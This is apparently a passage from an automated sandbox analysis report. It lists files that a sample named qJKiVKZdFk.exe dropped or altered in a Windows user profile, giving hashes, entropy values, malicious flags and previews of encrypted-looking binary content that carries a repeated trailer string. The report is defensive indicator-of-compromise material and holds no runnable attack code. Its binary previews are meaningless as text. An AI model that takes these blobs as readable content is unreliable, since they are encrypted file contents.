                                                                                                                                      Preview:..{..;.t.....K......f..%..]h..~.h..Y]...(S.r.X..e.>.|E........s....!.G...I$Z..zU/..<s...3..\v...r]o..m..9^r..G...$....O..\...'9.l=G.'K_m*...JG.....t..A.......-..d.E....~..r\...R6..;..i....R~E.U.4.w.>G}....-.j..oJ.FD;....W0C'..v.<....#.^.-....CV._..@.i..ac....:....2..c.w......o.W`....C\...w...v].N 2>....#.A....nB...Y.v7....K..A.o.....M>..|....U.+..4.......o.?6Y.A...X.w.j.5....Z.`...t.X....L.+6B...........~....9W.fZ.!...i..3...|.R..j>?....U....._k<..=B`......n.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\fluency\lm\en-GB\dynamic.lm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8865
                                                                                                                                      Entropy (8bit):7.977947110525777
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ejijXw3GSACPv6IZnyzs/t9lLEQWdiDmG0FcU+O6oC5qhYQaUx:eW+ECPybzspZyiyGHUbUqhYQ/
                                                                                                                                      MD5:343161663B46CDF8A7FCDC5C3EE42647
                                                                                                                                      SHA1:9EFDBED7CE87B291C88926DC75D63347C6B811B5
                                                                                                                                      SHA-256:0D5922CBB1645E11A9EBC3E1624D913F55EDAC418C19D5EA1FCD550EAC945F6A
                                                                                                                                      SHA-512:8D0A3E5974E22D83D1AA050BA41621F0D6FB2FDA76ADD7886F9A572AE44AA1F99660DD75345492A7B4B551CA33C1CA3F63CFD1D040124B626E7558ED791A4E1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:flueK..#,..Z..........a..!:{Uv....(.7.O.....p.5.N..ye..N:.=..........b.l.....Z...d1..}.0..LE.).K..) .au.....+.V.@.uo!_.vT...z..Sd.u........am.DL..:Mc...x....].m...N...g.mX..[R.w.=aK..f7.........7\.....cxNj=.*c..e\...8...o.fQ_jo..^6..%.T..l.pl.X...2.....j.pJ...>.....;.Ll....O.7.........?.R<"...|.'....q...b2b...Ov..ny./..\Di.*...|c.w..t....z....!..&............sfh...m...:."`>s?.v........Wkc..G.Q.....g..0L<.@..8.."8`...&G/...@.1.7;wK....&..K.4..."..S9..l.0.]....+.....6K.z.....~....R...Apm.<.S...........Q..R8.G.D..6.).../..EtYQ.}. G..]......`..P...&R....8V.....V@x....f.v..Q..2#M.b.../x$..:;}4N....[........<..v....Lu.v.QN...>2.BV_].x.%.......\..3`..[....!._.Wv.}1..<.<.*.......I.l.J....g).y.Pp.W.]^@.....$k.L....6N....T..F;O..e...MP......#..3:...0<$=.+.....tN....9....5....X..0)..&.:.k............j...@.#.:...a..cY[....w.... y....G........F.2..Fc..a.....0zm..>C..5.U...J..Nj.\..m.:..4.........C.3%....=.>....ksA\z...Z@d....8>X......~...xH.=.".

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\fluency\lm\en-GB\learned.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):988
                                                                                                                                      Entropy (8bit):7.786405373291487
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:NRpw7ZwByPIcb17IIHHA+btjHvM5ldrfr5ZbD:DSZOywc5TZvMRVZD
                                                                                                                                      MD5:7085993D3F23777E454CB4D2151DD4CC
                                                                                                                                      SHA1:2A540F72D19A23B732F96D67A2B4AB1330B40367
                                                                                                                                      SHA-256:A5E263FBCA2218EECA23B0A573B77C6BD8BBEDAC8C6B2EA6C6A1426BBB637844
                                                                                                                                      SHA-512:70D42EB06C30E81517D0DF13D60AF7A6F7851AE3CC15CAEB5698A46FEE28A8736690365BB358EB986EC4A9425ECE91B1DD78AB67A8F90FE5AAF5C9FD73B3F547
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..{...0[...1..&..Q\...V..!M.d..f....;.?M.h..6.....k.n.&)...../"i........d../..|..xMz.\$..d...t..R.2.T..h@.....j....)rQ.n..L#.Ic.\.iC5@.jKSssG.>Y..K..M.X.@........&Q.b...B.....2z.X./..YU"....r.X.6T.*`X.zi.fb.....1o..n.@..}...}.^...+-.Z....>....0];v`.<......6..m%,e....<..m....?.`+.M.h...t....?.....f..E.)=.[..~-.$.J1......c"..,.."I!.Q.%.W.S.j'->...X..C9.......U...52.op.b..y5h.h...A<....j.....U!...~F.[.x..T&vp.p.H...}0=.)....>.B.cX......|.().t?.R...k=4......D@.R.....:XZ.'..hI........jWBw{V.._.z.v..6.>6V ..<.;.>.,.<.].a..:N.A.....Dw.68`..O.e.P........"*.A.X....I..k...p}4.....z2.EI%c..q.../.E.;.s;.;..._K.......+..8hg......F.....m5.X..........N..D... ....6..%R!.u.......D.K t_.....9.\...&...4.......Q....E+.*.6.p.G0...q..[P....'].Clu.WJ`..n.b.....Vp.s.H]..3o.`J.H$J7v...,._..8.....t.0.y..Ft...%..i+./8.H.`.qGU..7...[....o...1sZ..}....{..;..%.`..LkT......9`E.5...2Mtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18241
                                                                                                                                      Entropy (8bit):7.990059228457249
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:iov3pJhxdplmmV4ggm18NeZQRDK/mbNr3GfPntFToU94tK86L2GeOKcX:/v3p7zpUmV4g6cwWebNi3ntFUU94M8KB
                                                                                                                                      MD5:918B7A2BE01A86EEE91EE14432BF59BC
                                                                                                                                      SHA1:2F52C26C107D49EF947A6255D6B3C2362E151ADA
                                                                                                                                      SHA-256:C61D3ED02F37C9A1D63A0CFF97CDF3B8070638253DA3927946359CADAAD6AB87
                                                                                                                                      SHA-512:485EB8BB309345FFA80735FB03226A6088F6C0A4A9D33D088E9E7FFA5E043AC2146F5AB6AD333254DA97C0FA77BE53B169C99389273D45BB7395602DBBCFE000
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:03-10.8......."`hM..4I..6X..t.. U....4..W<......BS!.j<.z.j...G...-iv.2&y...O........0.E....B...gX.c.h.FT.-.Kk.V.7.v...S.....M...f..<ON..wc(...C.x....\B...M....C/.7C9.,.....=.n.B.j....{R{w!..GD..[.........PR.P5...ygx.e.R}T5H........(..Zi..u~..2.$..W....~.J....).=v....s.u.w..d&.Z.*fN@z.F.8.......6.....J..d81.%..P.....".F.s....tW{.E...@.e."4.W.[....B._..V.2..'..?.*)Y;...&Fu~_.)b,.!..D.....<.P'bj.0.w+.......94...?X..:.|....r?..[K.'..5.X..........5b..DW..;o\..w..j...J.3.{4....Y'x.. [....:`.}....fM.ha.Z...Z~.X...............?.I..$}.......@.......0.!.72.Ke.AE.'.3.Na*../..8XS.*[=..4.K.>aj.fM\t..'.f.Of..X...".....]D.5=i.../......U.Y....N.+..c-.......k.F^L.?f.d...*..=..81e.A.r....Z..B.<....Q/K75....R4.B..v....*qZ.......... ..G.....Ej).j<..@..........{..m..?.~.# ..... ................Z...h.8.WyMk...,..U:.#...T>...{.U2.+....Z....j.4...F...V....n........p.sw...d..t...W}..|..B.?R..J3..4.....F.)c.....D....%..(..^T.NO4....1.3y.J.D...c...\{.Gt.!I

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2894
                                                                                                                                      Entropy (8bit):7.921252650367388
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:kD0lxAoiYQwhAJpZXB55/qOiuskra+lmeonlVEAxy+4nOCRq6BdmQhCwdsD:rCsAJfBTpnvJlkFqOf6BdmQNI
                                                                                                                                      MD5:ABA28EB4F0E4D1F743D8CBF6EBF3B298
                                                                                                                                      SHA1:CB2C0EF0E695277EAD8EB7F664519AB6FAE40C10
                                                                                                                                      SHA-256:17A35B0FF451F073F5118C942F2CDFD4AB2435E3E1AA6509C8C0B5BF7F67E449
                                                                                                                                      SHA-512:4CB509CFF18A50A1ED62C26991CDF698DB4628371AEBBC5A8196DBACDA9184A55C44213D39834EB2F32054B064DB1932D82C68EE3CF7B815396626D7A9187C89
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......\21.._|..T.......~}`[.n_\.r.s.L..$GR...rC....<...O.!..`d.q)..$U[.........{.|1....8l..{.<2....WZ.7e.`g.(. A...H!.q.(.>!.........K.&...1~...w(.(....6.^.3.7..H0\..-.O..).V...=J....D..d....j.{....h..(U..cy.~...S.....5dW\t'...z]OP6d.Q.)..L..D...t....:.W4B.b..8Zz}....G..}A...........&e.0...P6.$...D.{.h.+.2.)....Z;G].5m...*.#....P....Pg.F}..\..T...T.1|w.r.V.|g..~SrZq*..w......_CK...=`.......9!<..-(.g...X...Qq?..e9..C...s...@_q.m|@T#.8d...m..j..WPc,;.r.E...hB#.. ...._,!..3..m..x.(.-.W`>.4{..j.....XT.....]..>wl.?.....)J..DyB[..D../ .5..M.}..mu..<W..k...h+.k...A.M..\....0..L...A.o(...,./.q..G.b.fZ..].?.).q.6.....JP.~5;.@_JD..9.......&.....2..(.&.Ho.VMX...j..ot.P@..!.K .".Q.Z...~n.!AL~..J3.2..k.Pi..B.......6kV]...D..N....~..Al............Sfm..(.......~AnZ.......m9...^..J.w."o._.GM............?.......%...q..c.p....e.4k.....L.j.}.T.YW+|.U...LX..9....e~n.d..x..<=...aN......r..`,.....*..QY:..%.X..%}.I....qDi..........3.....L....S(=8e...

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9550
                                                                                                                                      Entropy (8bit):7.980789389107101
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rkBWFg8QjYQ7hWH7XYBrKlB458yZtYHdAqm0lFpn:rk9sMIH7XMrKly58yvpq9lFpn
                                                                                                                                      MD5:003BEE4EFA62ABFDF1197B18B1DB1656
                                                                                                                                      SHA1:8611CE0093E84C745929C0F75CEF200DABECE565
                                                                                                                                      SHA-256:404BF98E27771E3B793814B0E40EB2EF9D6649758D0EF5C6EDC05ADF6223B925
                                                                                                                                      SHA-512:E93F5E961FDCECB79AA00C4CCB644D1D06CC3CFF0C126F33AB57D960AB814B9EB835382CBCE0235318CD37D31A65FA52D5CB703033A55F8E9DE63B1589DBBAE3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....y..=O...R.yb...u...b.G>.....33(K....8..|/L.......4.......-..._.f.).c}.:...V(.a%..[Q...k.....T....<.e...G.=k7.7...aOF...^$....9........o.8. f...7...c.........?..&...NS25.G.;..N.^...JX...TG.W.[.2.....`O.Z.k....]A........c2.@/I.R._.H........3.........4O:..v> ..t.$.-..|..-..L.gJ..a..kC..L..-..|.P._.....=.T`...;.;..........);.&K(=...=.\.3rZ....e..j.[.s.....s....S...#,?....7&..L[x....l.O.$1`.......V.~*.J.3.......@i.0M.<.1..YU..c....f...........O...aS.{z.G..Z...p*xO5.Pz.....P....d.s...wtq....7......G..!.e.V.....G...=N5..H....ks.x|As......iM"0.d.)$./.._.{4...x2..58........`....]...<T.i.......)..R.p`........".#&I.%....4......<..Y7c...S..l...Bg.=...h....Xn.F.)T..s?..mgE;7'.s..^.7r'..|.C....u.....p.-i...)^L9F......qc.;.yV..y..`._..z.......7.E...u.....e....>>2.....%.`-mf.&..>QW..&.......2.(.[. ..3..9....fg.....W...\.6}.\...<v..Z}.j.[.Z.9._./MN3{4.[..p.d..B...r.8l.N.R.84.....K(Q.."wK..K@.U<..K<*T......'.>.j9.K.6..~...z..DO.r...$j.v|o."...\Z.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\fb3b0dbfee58fac8.automaticDestinations-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2894
                                                                                                                                      Entropy (8bit):7.928115971299037
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Y/AhQZj3ha2csBZWO+iKdP5K486VxLYQldRsC/WGacVX+8MJzrtl1ZD:Y/AhgapjK48uVnrWCu+cRzj
                                                                                                                                      MD5:EC0E2D437B05DA33BC57F89A0A889553
                                                                                                                                      SHA1:A16180B3898C65B78291DF5B2329273AA55B4211
                                                                                                                                      SHA-256:7870CA47B0C02715B0BDB5644D4470C7FECFABED05E3CF9C801F95AC36909639
                                                                                                                                      SHA-512:05C31C6C90627B01F7DF5E395182F0055CD8FFE4BC5388AF3958ADB77AE410FF2FDA821943107431BD0201050EF2007D04896D92F1875DCBC310373FD5F7666E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....x..q.=...L.[3.L..,..]V.M.\.|.8.{u.I....-...@..).M~e...3.X....C.Dv.Q.z..".c.........L...o...B..^...P;+.|.!44.e.h.*..j.......!..<^$.D..;r..MU.gCX&p.c..T..zD@..U..Z...S....i4..fs.k...Q.....!Q...In.w.C..P.........vm..2..z......6.....$._.E?R..2.......\....\.d$..v..~0a...iN...:'..5......l...:'.XS...#...P%A`........}......R~..+. ).D..|.R. ..OX.J._.D...'0...|6.......tf4a..Ow...........P..d....Xb'...Z.<....NJ.Y.... 5.U...'8G.p8.q.(p.....A>...!.S.....{M@.P.L....o.....f.x&...[Go....[$zwx..r...*...^b..8N6v.Z..3.oP...Vjv....t."..q...l.qe.-..\.orvX.".Y....H5.@...?..=..cx,....L.%......P<fo8..o.$...56....K...[...[m....q........Y...#.Q....bY=.{S......GO9./u.........7..s.....u.A.D..5.$...<....or......t..f.g..i..B.,-.w..;H...9.F.Ka...u..3.OC..5.....H..n..NBLh.l.'{..H....../E:H.h.....(..h...7.D... .l....!#.*.v4..=g..C:..T#....A.w.1]..D.....f.~,/....v..^TJ.$2j.91[..rX...^........Y.aDCL.^..e........r...#s...gW........d...P.l......z.......I.0.e.......6%...

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.30894408921438
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:fYUIvnl779suoqTJwnV4M6yoYvk0/f9ADBWyuc+77B2vS9U3ukIcii96Z:nIvnV7OuoDgcff9iBkLF2a8ukIcii9a
                                                                                                                                      MD5:B25A9513947779E7F9A289270800358B
                                                                                                                                      SHA1:12C7FA139C0E4330D9F19BAC99E58BF4D8C62BC0
                                                                                                                                      SHA-256:C5741809600172FDCE265A3C265D2F20E6AA610800DDB09E995100B3AAA4E560
                                                                                                                                      SHA-512:AADE826D46B35E7339268AD056FE1A61703D29E519DE95FB15AF2C7F3C11F5C1662D0D67620AD0178DB415E397F8364344C565C727519376E128B981CA649D32
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.......D.J^2*.?..P.|x8.R..u.x.^..)..+.(5.F..[.w.~..(bv.F.w.j..y.f.L..K....w..C((...t.....X..IVB?1ds."..I.I..9..Q.c......qh......&.<.U.5Wrf..M...]..c%..5.....Fn).?..br......d~.4I..Z.6.u....mn.W-9.G...EePSQf..\9N.....V....U....2....9.....c..6...D.....A .03...!..H....[.U.(.>.._3tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.295986422952154
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:DkDJ4CzBiUrrj+13UjP94TOt7NJYxAtqTDDvgV6BsK3oniA33ukIcii96Z:DEvrrjyUr94TORHxsTDCysKYnlnukIcq
                                                                                                                                      MD5:7F8B9F542C240BCE58E434F9FA82E2AB
                                                                                                                                      SHA1:02773B364E3D0B4130702B4966FB4BFEE34D3CC3
                                                                                                                                      SHA-256:AEF859804D70DAE1DF7138B992431C73E009B6DA20E6700E6F07A77AA06DB182
                                                                                                                                      SHA-512:4131E7B4A1B669554C760A9A62DEFED704A09D241A9368571E387B492F13AA98F8F86DD77B34CA199230EDAA10D26F3291ADA2543FC32C7CEC6A8C8F5D5D0281
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......z.k2.{...~O..I.z._....8Ix..>r..JFs@...Xn.rf8Lo..........L..M...'gJF;.^......e.W.q...A..r...Xp.:.v...^.Taj......V..V..W....SEa.;=..&A .uD.HJ..4.L..O]..$.....3.T.6v...h..."z.n)2m....,....M.#'L."....S...5G...Y(.e&.F.tS!bv\wL*....h.(.K.st.m6....*/..6W.."..7@B.Jtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f18460fded109990.customDestinations-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.33971331797188
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:HS4tRk1yaiPRLboCd9jdrFPv9B9Lzv6vaKvzVoV3ukIcii96Z:HSHydk8BBGZUukIcii9a
                                                                                                                                      MD5:116AA31E945969EDF7F363D7CECFD012
                                                                                                                                      SHA1:6C2541A00F659CB9DD73FBBC8DBBDFD17812D349
                                                                                                                                      SHA-256:6850DDA88BF918A26C833A60BE4B8F747DDE204EA7D70F1366B92FB9E7FDEAE1
                                                                                                                                      SHA-512:3FDDFF1DEA77550DE3E64F46449607A05EF24686805D9FBDE8D1302B9CCF72D8701D40DBCF120ADCAAEC3D8A5F78661B7831B43EE0C2E35F9009411CDA8EFDFE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....m.WB...4..../..n..?...YG....4....."..8...\ZTP...?.......c'.\...3.... ....1.PJX...a...[.@....kCa.!...."..P..Y....R..ipk....*p.%....n...6..#._.....1.V.R....c.".~F.i...O.j`.u......u.THo.p.f..|5I ...[..B.o'.SQ.../.. ..NYK...q.W....S<S?.}.[.-i...>........].f#..Caf.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1383
                                                                                                                                      Entropy (8bit):7.8714214674142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:R/OK6i4Z5gAqYIcy80n1jJZsfFm06nicSRbx83KnAOWuO9GgJMtolccKEWIbD:sK6i4ZylRB910wX0i3AAOWuvt4WSD
                                                                                                                                      MD5:49E8A284FA8A3FFC0122B3F55EE3A571
                                                                                                                                      SHA1:96C1DB63D662448FBCE0E2B0EDDD086734879A93
                                                                                                                                      SHA-256:930070030B022CB9B996EB3CF81ECCAF91DB30206A6FD062B68450E09B28CAD8
                                                                                                                                      SHA-512:537CD83774580FA55E55B4FFCBDDFC3F56DF32B45D7BE0D9DF6AB5B58C7D1FF293B6E14C4BB06DE18F1AFE26AB1757669699501D54BE4042DDFD9E6A49629551
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L.......:.a7..(.h....C.A........w.7....s.....%.(]J..F\OV...X....Q.T7...>c...:.T!.Q.E$.\..]....9...C...o.T....r.......zVq.q.s2...+E.=...)[..4A.)...V_J5.].J.d*.feB......F=6.L..{.LN ...A:3.T=.a;...< .+M..5...R.."^..-&..-..i(...2)U><..Q./.?.%.....t.{........v.R.-.4.j.G..W/.+.....$..<.y.{U#..x..y.9...{>Y..6..........ZD...h....N*.../...dqh..}N.o+'.7s.........#.Mc.X...~<.d..b.'....ES.....O..U...~.W.D...jr.FV..?@.....i.... 0......}.d...w.h.>_;A...s.m...&)},+8^b.|.,.P.N(.d....an.S1.!l.t..4.......O.aVS..k..nS.$K..o.H.#.....1.i".,O.C..;Z.]..u.].J.H..u*........ .X.....n&..<..........2.#.......F.....Fl....r...S.O..x..!......A~..9i.l......,~v..H.@.G...!.J ..3.....E..e...GHaw.g.?"...g.w.H2].Mz....^I...y...'1...rB....s.6~.e....md.RuD@..j'O.A...$.or.............3....|-I.....l.+..ee...wi|(YC...0.1.-.C..m1>c.......~.......M....\X.U.&.a..:...'l..ui.fK..=./`.....n7D..~t..|..$..z..q.$....J..2\QJg.|..c._..@..,_...3S..(..{.._.E.....l...n.xA.._..:...b. ...).y..

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):341
                                                                                                                                      Entropy (8bit):7.2493456551344915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:5znhDQKXPkH+CT0bzGOqHd3Ob2jf9BdlltJg+DBx27vSBMWHQq3ukIcii96Z:BpQKXPkH+CTL9+b4lrq+P2jtmXukIciD
                                                                                                                                      MD5:7698A6BFC418991A34EE349BF8190EDE
                                                                                                                                      SHA1:3296749F5A7FFE2BEBD165AA85950822B037D39B
                                                                                                                                      SHA-256:EE0B684A5137CFC99D06448568F7C0E5712D61381B4D90B9961A8422355AD8A2
                                                                                                                                      SHA-512:E433AE1D4054DE832437F668002A091EF5C0E9ACC0F0C7F3D9C14BE63566E8E969E016A52D8195BFBF188457B3CB8057FD3AACB4F116BA8E7ED68517D92922AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:desktI!..d....,0.d..jk..r.(.d-2.1.V.h...MLM.+....!=...Q.C......5...Nd..ea.'..3...{.-.......!.......~.R[.#..,..'.*..W+.4".T.....W.6.+..=...)\ ..id...5.._.h..V.b....].:.O..O....&\..\.<.i.l8..).0...{\:x..I.B...g:R....EI..N.l.:.[c..w..c..b..,....:.....=.u.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:JPEG image data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):68018
                                                                                                                                      Entropy (8bit):7.997412873788523
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:U/pEb/ZZy4jzgqj+ZbreU6/AgGzUZKYpHwkPVTdznLU2:QEbjy/XZKFRpQcVTdzh
                                                                                                                                      MD5:CA71CCD40F7861C8EB8816C1A2DE109F
                                                                                                                                      SHA1:630487513E986FF9277FA5D30A2757F1BD838C40
                                                                                                                                      SHA-256:6BA5D7BA4CCC7D2ECF3F9570D11ACC9900B3C9F2424E23F2F60041D09AAF2260
                                                                                                                                      SHA-512:2713263A35FE98558E387D9FFA7BA2C822DB87A319B1BF35E32551CBEF0D41D824D8C818C9A55AE68309E982EFCC8B1D0E7B165E3311060F748463119314E8BF
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..............$Ab.uc..-8uAh7\s`,V....~g.j...........ok..o.$.;...=E".?H.........D....yQ`q...FbU...6O%....M..8PK.L.g.3.s...&.~...>._.U.4....h..,..Y.....bF@.z.3z..N.E.p..i.O.J..(..z..-....N......Hk.....6.W......;.5...uJ.. ....yD..<{=LQ..h.......52p.u-I..Q......".;9..j..hp.....e_..S.;...|...88q..(~(.9cR.W...D2$:d7.c....!gSa^0.....lG~...RO...e.ik\..:...@8...R3lF..}......d..f.{.\+..w..2.s...?na.qh%7.XE.6._...OtP..w..%.^...."&UC..U....p..b...DK ..KU..-..........A^..K."ejP....o..A.u.........ZfI..4..y.&.+....Z.:z.g...o.AL+\..".X.P..Om...q..0..rnk..A.c.D......l0.%nt.........U.........^..}.'....:AA..3......_..vi0..A9"....G..t.........I.-dW.P ..A....<.O...L:.W.JA|/..M3<..Y{....rhR..6W.iX79KZ.~.....Z.w.....h.&..U.~l.A......;..r..;......0.....q.Y:`.1..u{..._E............N6.C.0$...|0{.......O.-.........y.....93~..]....H>4........N..n...kQc......H=..o~..+.M..U..U%.i..u4Za.gMT..L.x0`...m.%w+^.....b..E.....tV.,K........Y&..?...Z..W.I}.....b

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):488
                                                                                                                                      Entropy (8bit):7.456163301134496
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:2sLCgryKHYxY/ipVuYS6jAmjfpBt/+Svv/4FukIcii9a:2segry0YvpEYSoD5/tvvQibD
                                                                                                                                      MD5:E36315C6236C4263257461AD271FEAD7
                                                                                                                                      SHA1:E090E4AC9D3C0FF6A28EEBFEF0D9D5EB26AD7ABF
                                                                                                                                      SHA-256:4E8CF7C1F97F6B6A118ACAACCC9203CDBC76349AFD40CE74E63F9888230AAA6B
                                                                                                                                      SHA-512:E0D3234C8D6784C45B3FB796BA9AA4A19450434404F2B4990FDC0A692CDF4E759A41AEBD11414DDB52C05E9CB22CF6982CADEAE5411C8E8EF05055EE89192AE8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:httpsi....QF...c.L%.Q.`.^$x.m"T*G.....B.....O.;..."..".|U.By...v......;.Gp`.].?.....o.].yQN.-9....~5)..G..No.5...M..<.7........."..g^..Z.=1.:bd..c....6<...`KM/.M....v.....Vj.`Ma... .W..C.yX.ddN.z..,N....}..bX?......>It}%.e.e.4P.=.TM...kM.RU..)}2.q.....+..K'..C..:.,...6._:....`.......o...~.sj z.}H....*ss.3.]z.5....6....y<.7v[?.'.l..E .?R....Ec.*.0...Q...,U.@:H..,..e..J.....!`.n$.rG...S[.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.922189266568649
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:YNHnZcMRJNmXek2Pm8V1qjat6Yjvp3d32bZVhVDGwDKXp1ILHIe9t5/+D:o5cMREw1qjMnvp3dMZVhVDG2K5O3/G
                                                                                                                                      MD5:E7860E89ED3413E4D2A8CE5EF589277A
                                                                                                                                      SHA1:EC7BFAB485E8DB44C2353B176A16834BEA3579DC
                                                                                                                                      SHA-256:CCE306F878EB13913DB9C9189F0594B3A56BC1DB6C693E33D90C4239CA58303C
                                                                                                                                      SHA-512:4C9D03FEE03A6C04AC72D63B4689690AB5AB7D41068EF572AC21A7B944756CDCA296DB0089DEC589319FD022D32636CB16B957008E60BA1FC4899B5E979EE047
                                                                                                                                      Malicious:false
